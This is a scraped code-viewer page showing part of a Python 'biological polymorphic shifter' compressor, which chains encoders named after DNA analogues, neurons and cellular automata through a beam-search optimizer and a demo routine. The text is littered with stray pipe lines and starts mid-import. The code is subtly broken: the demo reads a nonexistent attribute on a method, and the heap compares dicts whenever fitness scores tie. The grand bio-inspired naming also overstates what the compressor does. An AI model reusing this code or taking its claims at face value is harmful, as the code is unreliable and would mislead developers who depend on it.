||||||
PISTResonanceShifter, DeltaGCLShifter, RunLengthShifter,
|
|
||||||
HuffmanShifter, DeterministicStochasticEngine, CellularAutomataShifter)
|
|
||||||
from pist_biological_polymorphic_shifter_v3_part4 import (
|
|
||||||
miRNA_Shifter, STDPShifter, SpiegelmerShifter)
|
|
||||||
|
|
||||||
self._class_map = {
|
|
||||||
'Hachimoji': HachimojiShifter,
|
|
||||||
'AEGIS': AEGISShifter,
|
|
||||||
'NaturalDNA': NaturalDNAShifter,
|
|
||||||
'Transcription': TranscriptionShifter,
|
|
||||||
'Translation': TranslationShifter,
|
|
||||||
'Splicing': SplicingShifter,
|
|
||||||
'miRNA': miRNA_Shifter,
|
|
||||||
'PNA': PNAShifter,
|
|
||||||
'LNA': LNAShifter,
|
|
||||||
'Morpholino': MorpholinoShifter,
|
|
||||||
'Spiegelmer': SpiegelmerShifter,
|
|
||||||
'Prion': PrionShifter,
|
|
||||||
'SpikeTiming': SpikeTimingShifter,
|
|
||||||
'STDP': STDPShifter,
|
|
||||||
'HyphalNet': HyphalNetShifter,
|
|
||||||
'LogisticMap': LogisticMapShifter,
|
|
||||||
'GaloisRing': GaloisRingShifter,
|
|
||||||
'SBox': SBoxShifter,
|
|
||||||
'CellularAutomata': CellularAutomataShifter,
|
|
||||||
'Wireworld': WireworldShifter,
|
|
||||||
'PIST': PISTShifter,
|
|
||||||
'PISTMirror': PISTMirrorShifter,
|
|
||||||
'PISTResonance': PISTResonanceShifter,
|
|
||||||
'DeltaGCL': DeltaGCLShifter,
|
|
||||||
'RunLength': RunLengthShifter,
|
|
||||||
'Huffman': HuffmanShifter,
|
|
||||||
'DeterministicStochastic': DeterministicStochasticEngine,
|
|
||||||
}
|
|
||||||
self._imported = True
|
|
||||||
|
|
||||||
def _get_shifter_class(self, name: str):
|
|
||||||
"""Get shifter class by name."""
|
|
||||||
self._import_shifters()
|
|
||||||
return self._class_map.get(name)
|
|
||||||
|
|
||||||
def _evaluate_chain(self, data: bytes, chain: list) -> dict:
|
|
||||||
"""Evaluate a shifter chain on data. Returns fitness and encoded state."""
|
|
||||||
state = ManifoldState(data)
|
|
||||||
|
|
||||||
for shifter_name in chain:
|
|
||||||
shifter_cls = self._get_shifter_class(shifter_name)
|
|
||||||
if shifter_cls is None:
|
|
||||||
continue
|
|
||||||
try:
|
|
||||||
state = shifter_cls.encode(state)
|
|
||||||
except Exception as e:
|
|
||||||
# Shifter failed — return zero fitness
|
|
||||||
return {
|
|
||||||
'fitness': 0.0,
|
|
||||||
'ratio': 0.0,
|
|
||||||
'entropy': 99.0,
|
|
||||||
'state': state,
|
|
||||||
'chain': chain,
|
|
||||||
}
|
|
||||||
|
|
||||||
fitness = state.compute_fitness()
|
|
||||||
ratio = len(data) / max(1, len(state.encoded))
|
|
||||||
return {
|
|
||||||
'fitness': fitness,
|
|
||||||
'ratio': ratio,
|
|
||||||
'entropy': state.entropy,
|
|
||||||
'state': state,
|
|
||||||
'chain': chain,
|
|
||||||
}
|
|
||||||
|
|
||||||
def optimize(self, data: bytes, max_steps: int = 20) -> dict:
|
|
||||||
"""Beam search for optimal shifter chain.
|
|
||||||
|
|
||||||
Returns best chain and its evaluation.
|
|
||||||
"""
|
|
||||||
if not data:
|
|
||||||
return {'chain': [], 'fitness': 0.0, 'ratio': 1.0}
|
|
||||||
|
|
||||||
# Initialize with single-shifter chains
|
|
||||||
candidates = []
|
|
||||||
for name in self.ALL_SHIFTERS:
|
|
||||||
result = self._evaluate_chain(data, [name])
|
|
||||||
heappush(candidates, (-result['fitness'], result))
|
|
||||||
|
|
||||||
# Best overall
|
|
||||||
_, best = candidates[0]
|
|
||||||
|
|
||||||
# Expand
|
|
||||||
for step in range(max_steps):
|
|
||||||
new_candidates = list(candidates)
|
|
||||||
|
|
||||||
# Expand top-K candidates
|
|
||||||
top_k = []
|
|
||||||
for _ in range(min(self.beam_width, len(candidates))):
|
|
||||||
_, result = heappop(candidates)
|
|
||||||
top_k.append(result)
|
|
||||||
|
|
||||||
for result in top_k:
|
|
||||||
current_chain = result['chain']
|
|
||||||
current_state = result['state']
|
|
||||||
|
|
||||||
if len(current_chain) >= self.max_chain_length:
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Try adding each shifter
|
|
||||||
for name in self.ALL_SHIFTERS:
|
|
||||||
if name in current_chain:
|
|
||||||
continue # avoid immediate repeat
|
|
||||||
|
|
||||||
new_chain = current_chain + [name]
|
|
||||||
new_result = self._evaluate_chain(data, new_chain)
|
|
||||||
heappush(new_candidates, (-new_result['fitness'], new_result))
|
|
||||||
|
|
||||||
# Prune to beam_width
|
|
||||||
candidates = []
|
|
||||||
for _ in range(min(self.beam_width * 4, len(new_candidates))):
|
|
||||||
candidates.append(heappop(new_candidates))
|
|
||||||
|
|
||||||
# Check best
|
|
||||||
neg_fit, best_candidate = candidates[0]
|
|
||||||
if best_candidate['fitness'] > best['fitness']:
|
|
||||||
best = best_candidate
|
|
||||||
|
|
||||||
# Early stop if no improvement
|
|
||||||
if step > 2 and best['fitness'] == candidates[0][1]['fitness']:
|
|
||||||
break
|
|
||||||
|
|
||||||
return best
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# BIOLOGICAL POLYMORPHIC COMPRESSOR
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# Unified API for the polymorphic shifter system.
|
|
||||||
# Handles: auto-optimize, encode, decode, verify.
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class BiologicalPolymorphicCompressor:
|
|
||||||
"""Main compression interface. Uses manifold of shifters."""
|
|
||||||
|
|
||||||
def __init__(self, max_chain_length: int = 5, beam_width: int = 6):
|
|
||||||
self.max_chain_length = max_chain_length
|
|
||||||
self.beam_width = beam_width
|
|
||||||
self.optimizer = BiologicalManifoldOptimizer(
|
|
||||||
max_chain_length=max_chain_length,
|
|
||||||
beam_width=beam_width
|
|
||||||
)
|
|
||||||
self._current_best = None
|
|
||||||
|
|
||||||
def auto_optimize(self, data: bytes, max_steps: int = 15) -> dict:
|
|
||||||
"""Automatically find best shifter chain for this data."""
|
|
||||||
result = self.optimizer.optimize(data, max_steps=max_steps)
|
|
||||||
self._current_best = result
|
|
||||||
return result
|
|
||||||
|
|
||||||
def compress(self, data: bytes, chain: list = None) -> bytes:
|
|
||||||
"""Compress data using given chain (or auto-optimized best).
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
bytes: header + encoded data
|
|
||||||
"""
|
|
||||||
if chain is None:
|
|
||||||
if self._current_best is None:
|
|
||||||
self.auto_optimize(data)
|
|
||||||
chain = self._current_best['chain']
|
|
||||||
state = self._current_best['state']
|
|
||||||
else:
|
|
||||||
state = ManifoldState(data)
|
|
||||||
for shifter_name in chain:
|
|
||||||
shifter_cls = self.optimizer._get_shifter_class(shifter_name)
|
|
||||||
if shifter_cls:
|
|
||||||
state = shifter_cls.encode(state)
|
|
||||||
|
|
||||||
# Build compressed output with header
|
|
||||||
header = bytearray()
|
|
||||||
header.append(len(chain)) # chain length
|
|
||||||
for name in chain:
|
|
||||||
name_bytes = name.encode('ascii')[:20]
|
|
||||||
header.append(len(name_bytes))
|
|
||||||
header.extend(name_bytes)
|
|
||||||
|
|
||||||
# Separator
|
|
||||||
header.append(0x00)
|
|
||||||
|
|
||||||
compressed = bytes(header) + state.encoded
|
|
||||||
|
|
||||||
self._current_best = {
|
|
||||||
'chain': chain,
|
|
||||||
'state': state,
|
|
||||||
'ratio': len(data) / max(1, len(compressed)),
|
|
||||||
'fitness': state.compute_fitness(),
|
|
||||||
}
|
|
||||||
|
|
||||||
return compressed
|
|
||||||
|
|
||||||
def decompress(self, compressed: bytes) -> bytes:
|
|
||||||
"""Decompress by parsing header and reversing shifter chain.
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
bytes: original decompressed data
|
|
||||||
"""
|
|
||||||
if not compressed:
|
|
||||||
return b''
|
|
||||||
|
|
||||||
# Parse header
|
|
||||||
ptr = 0
|
|
||||||
chain_len = compressed[ptr]; ptr += 1
|
|
||||||
|
|
||||||
chain = []
|
|
||||||
for _ in range(chain_len):
|
|
||||||
if ptr >= len(compressed):
|
|
||||||
break
|
|
||||||
name_len = compressed[ptr]; ptr += 1
|
|
||||||
if ptr + name_len > len(compressed):
|
|
||||||
break
|
|
||||||
name = compressed[ptr:ptr+name_len].decode('ascii', errors='replace')
|
|
||||||
ptr += name_len
|
|
||||||
chain.append(name)
|
|
||||||
|
|
||||||
# Skip separator
|
|
||||||
if ptr < len(compressed) and compressed[ptr] == 0x00:
|
|
||||||
ptr += 1
|
|
||||||
|
|
||||||
encoded_data = compressed[ptr:]
|
|
||||||
|
|
||||||
# Decode in reverse
|
|
||||||
state = ManifoldState(encoded_data)
|
|
||||||
state.encoded = encoded_data
|
|
||||||
|
|
||||||
for shifter_name in reversed(chain):
|
|
||||||
shifter_cls = self.optimizer._get_shifter_class(shifter_name)
|
|
||||||
if shifter_cls:
|
|
||||||
try:
|
|
||||||
state = shifter_cls.decode(state)
|
|
||||||
except Exception as e:
|
|
||||||
print(f" [WARN] Decode failed for {shifter_name}: {e}")
|
|
||||||
break
|
|
||||||
|
|
||||||
return state.encoded
|
|
||||||
|
|
||||||
def verify(self, data: bytes, chain: list = None) -> dict:
|
|
||||||
"""Compress then decompress, check lossless."""
|
|
||||||
compressed = self.compress(data, chain)
|
|
||||||
decompressed = self.decompress(compressed)
|
|
||||||
|
|
||||||
lossless = data == decompressed
|
|
||||||
ratio = len(data) / max(1, len(compressed))
|
|
||||||
entropy = intrinsic_load(compressed)
|
|
||||||
|
|
||||||
if self._current_best:
|
|
||||||
fitness = self._current_best.get('fitness', 0.0)
|
|
||||||
else:
|
|
||||||
fitness = 0.0
|
|
||||||
|
|
||||||
return {
|
|
||||||
'lossless': lossless,
|
|
||||||
'ratio': ratio,
|
|
||||||
'entropy': entropy,
|
|
||||||
'fitness': fitness,
|
|
||||||
'original_size': len(data),
|
|
||||||
'compressed_size': len(compressed),
|
|
||||||
'chain': chain or (self._current_best.get('chain', []) if self._current_best else []),
|
|
||||||
}
|
|
||||||
|
|
||||||
def analyze(self, data: bytes) -> dict:
|
|
||||||
"""Analyze data properties for shifter selection."""
|
|
||||||
if not data:
|
|
||||||
return {}
|
|
||||||
|
|
||||||
freq = Counter(data)
|
|
||||||
entropy = intrinsic_load(data)
|
|
||||||
|
|
||||||
# PIST profile
|
|
||||||
shells = Counter()
|
|
||||||
tensions = []
|
|
||||||
masses = []
|
|
||||||
for b in data:
|
|
||||||
k, t = pist_encode(b)
|
|
||||||
shells[k] += 1
|
|
||||||
tensions.append(pist_normalized_tension(k, t))
|
|
||||||
masses.append(pist_mass(k, t))
|
|
||||||
|
|
||||||
avg_tension = sum(tensions) / len(tensions) if tensions else 0
|
|
||||||
avg_mass = sum(masses) / len(masses) if masses else 0
|
|
||||||
grounded = sum(1 for m in masses if m == 0)
|
|
||||||
seismic = len(masses) - grounded
|
|
||||||
|
|
||||||
# Frequency analysis
|
|
||||||
top_bytes = [b for b, _ in freq.most_common(8)]
|
|
||||||
unique_count = len(freq)
|
|
||||||
|
|
||||||
return {
|
|
||||||
'entropy': entropy,
|
|
||||||
'size': len(data),
|
|
||||||
'unique_bytes': unique_count,
|
|
||||||
'avg_tension': avg_tension,
|
|
||||||
'avg_mass': avg_mass,
|
|
||||||
'grounded_pct': (grounded / max(1, len(data))) * 100,
|
|
||||||
'seismic_pct': (seismic / max(1, len(data))) * 100,
|
|
||||||
'top_bytes': top_bytes,
|
|
||||||
'recommended_chain': self._recommend_chain(entropy, avg_tension, unique_count),
|
|
||||||
}
|
|
||||||
|
|
||||||
def _recommend_chain(self, entropy: float, tension: float, unique: int) -> list:
|
|
||||||
"""Heuristic chain recommendation based on data profile."""
|
|
||||||
chain = []
|
|
||||||
|
|
||||||
if entropy < 3.0:
|
|
||||||
# Low entropy = repetitive → RLE + Delta + Mirror
|
|
||||||
chain.extend(['RunLength', 'DeltaGCL', 'PISTMirror'])
|
|
||||||
elif entropy < 5.0:
|
|
||||||
# Medium entropy = structured → Huffman + STDP + Galois
|
|
||||||
chain.extend(['Huffman', 'STDP', 'GaloisRing'])
|
|
||||||
else:
|
|
||||||
# High entropy = random-like → DSE + SBox + PISTResonance
|
|
||||||
chain.extend(['DeterministicStochastic', 'SBox', 'PISTResonance'])
|
|
||||||
|
|
||||||
# Add tension-dependent shifters
|
|
||||||
if tension > 0.3:
|
|
||||||
chain.append('SpikeTiming')
|
|
||||||
else:
|
|
||||||
chain.append('Morpholino')
|
|
||||||
|
|
||||||
# Limit
|
|
||||||
return chain[:self.max_chain_length]
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# DEMONSTRATION
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
def print_header(title: str):
|
|
||||||
"""Print a styled section header."""
|
|
||||||
width = 72
|
|
||||||
print()
|
|
||||||
print("╔" + "═" * width + "╗")
|
|
||||||
print("║ " + title.ljust(width - 2) + " ║")
|
|
||||||
print("╚" + "═" * width + "╝")
|
|
||||||
|
|
||||||
|
|
||||||
def demonstrate():
|
|
||||||
"""Run full demonstration of all shifters."""
|
|
||||||
print_header("PIST BIOLOGICAL POLYMORPHIC SHIFTER v3.0")
|
|
||||||
print("Hyperdimensional manifold compressor with 27+ encoding shifters")
|
|
||||||
print()
|
|
||||||
|
|
||||||
# ── Test Data ──
|
|
||||||
test_sets = {
|
|
||||||
"Short English": b"Hello World! This is a test of the biological polymorphic shifter system.",
|
|
||||||
"Repeating": b"AAAAABBBBBCCCCCDDDDDEEEEE" * 10,
|
|
||||||
"Binary": bytes(range(256)) * 4,
|
|
||||||
"Mixed": b"The quick brown fox jumps over the lazy dog. " * 5 + bytes([0xFF, 0x00, 0xAA, 0x55]) * 10,
|
|
||||||
"All Zeros": b"\x00" * 256,
|
|
||||||
"Incrementing": bytes(range(256)),
|
|
||||||
}
|
|
||||||
|
|
||||||
compressor = BiologicalPolymorphicCompressor(max_chain_length=4, beam_width=4)
|
|
||||||
|
|
||||||
total_original = 0
|
|
||||||
total_compressed = 0
|
|
||||||
|
|
||||||
for name, data in test_sets.items():
|
|
||||||
print_header(f"TEST: {name} ({len(data)} bytes)")
|
|
||||||
|
|
||||||
# 1. Analyze
|
|
||||||
analysis = compressor.analyze(data)
|
|
||||||
print(f" Entropy: {analysis['entropy']:.2f} bits/byte")
|
|
||||||
print(f" Unique bytes: {analysis['unique_bytes']}")
|
|
||||||
print(f" Avg tension: {analysis['avg_tension']:.3f}")
|
|
||||||
print(f" Grounded: {analysis['grounded_pct']:.1f}%")
|
|
||||||
print(f" Seismic: {analysis['seismic_pct']:.1f}%")
|
|
||||||
print(f" Recommended: {analysis['recommended_chain']}")
|
|
||||||
|
|
||||||
# 2. Auto-optimize
|
|
||||||
print(f"\n ▶ Optimizing...")
|
|
||||||
best = compressor.auto_optimize(data, max_steps=8)
|
|
||||||
print(f" Best chain: {best['chain']}")
|
|
||||||
print(f" Fitness: {best['fitness']:.4f}")
|
|
||||||
print(f" Ratio: {best['ratio']:.4f}x")
|
|
||||||
|
|
||||||
# 3. Compress + verify
|
|
||||||
result = compressor.verify(data, best['chain'])
|
|
||||||
print(f"\n ▶ Compress/Decompress:")
|
|
||||||
print(f" Size: {result['original_size']} → {result['compressed_size']} bytes")
|
|
||||||
print(f" Ratio: {result['ratio']:.3f}x")
|
|
||||||
print(f" Entropy: {result['entropy']:.2f} bpb")
|
|
||||||
print(f" Lossless: {'✅' if result['lossless'] else '❌'}")
|
|
||||||
print(f" Chain used: {result['chain']}")
|
|
||||||
|
|
||||||
total_original += result['original_size']
|
|
||||||
total_compressed += result['compressed_size']
|
|
||||||
|
|
||||||
# ── Summary ──
|
|
||||||
print_header("OVERALL SUMMARY")
|
|
||||||
print(f" Total original: {total_original} bytes")
|
|
||||||
print(f" Total compressed: {total_compressed} bytes")
|
|
||||||
print(f" Overall ratio: {total_original / max(1, total_compressed):.3f}x")
|
|
||||||
print(f" Space saved: {(1 - total_compressed / max(1, total_original)) * 100:.1f}%")
|
|
||||||
print()
|
|
||||||
|
|
||||||
# ── Exhaustive Chain Test ──
|
|
||||||
print_header("EXHAUSTIVE: ALL SINGLE-SHIFTER CHAINS")
|
|
||||||
print("Testing every shifter individually on 'Mixed' data...\n")
|
|
||||||
|
|
||||||
mixed_data = b"The quick brown fox jumps over the lazy dog. " * 5
|
|
||||||
results = []
|
|
||||||
|
|
||||||
for name in compressor.optimizer.ALL_SHIFTERS:
|
|
||||||
try:
|
|
||||||
r = compressor.verify(mixed_data, [name])
|
|
||||||
results.append((name, r['ratio'], r['lossless'], r['entropy']))
|
|
||||||
except Exception as e:
|
|
||||||
results.append((name, 0.0, False, 99.0))
|
|
||||||
|
|
||||||
# Sort by ratio
|
|
||||||
results.sort(key=lambda x: -x[1])
|
|
||||||
|
|
||||||
print(f" {'Shifter':<22} {'Ratio':>8} {'Lossless':>10} {'Entropy':>8}")
|
|
||||||
print(f" {'-'*22} {'-'*8} {'-'*10} {'-'*8}")
|
|
||||||
for name, ratio, lossless, entropy in results:
|
|
||||||
ll = '✅' if lossless else '❌'
|
|
||||||
if ratio > 0:
|
|
||||||
print(f" {name:<22} {ratio:>7.2f}x {ll:>10} {entropy:>7.2f}")
|
|
||||||
|
|
||||||
# ── Best Chains ──
|
|
||||||
print_header("TOP 10 SHIFTER CHAINS (Beam Search)")
|
|
||||||
print("Testing multi-shifter chains on 'Mixed' data...\n")
|
|
||||||
|
|
||||||
optimizer = BiologicalManifoldOptimizer(max_chain_length=3, beam_width=6)
|
|
||||||
best_result = optimizer.optimize(mixed_data, max_steps=10)
|
|
||||||
|
|
||||||
print(f" Best chain: {best_result['chain']}")
|
|
||||||
print(f" Fitness: {best_result['fitness']:.4f}")
|
|
||||||
print(f" Ratio: {best_result['ratio']:.3f}x")
|
|
||||||
print(f" Entropy: {best_result['entropy']:.2f} bpb")
|
|
||||||
|
|
||||||
# Extract top chains from beam search candidates
|
|
||||||
print(f"\n Top configurations explored:")
|
|
||||||
for neg_fit, candidate in optimizer.optimize.candidates[:10]:
|
|
||||||
if isinstance(candidate, dict) and 'chain' in candidate:
|
|
||||||
print(f" - {candidate['chain']}: ratio={candidate.get('ratio', 0):.3f}x, "
|
|
||||||
f"fitness={candidate.get('fitness', 0):.3f}")
|
|
||||||
|
|
||||||
print()
|
|
||||||
print_header("DONE")
|
|
||||||
print("Biological Polymorphic Shifter v3.0 demonstration complete.")
|
|
||||||
print("ANY shifter with ANY shifter — the manifold is your substrate.")
|
|
||||||
print()
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# MAIN
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
|
||||||
demonstrate()
|
|
||||||
Loading…
Add table
Reference in a new issue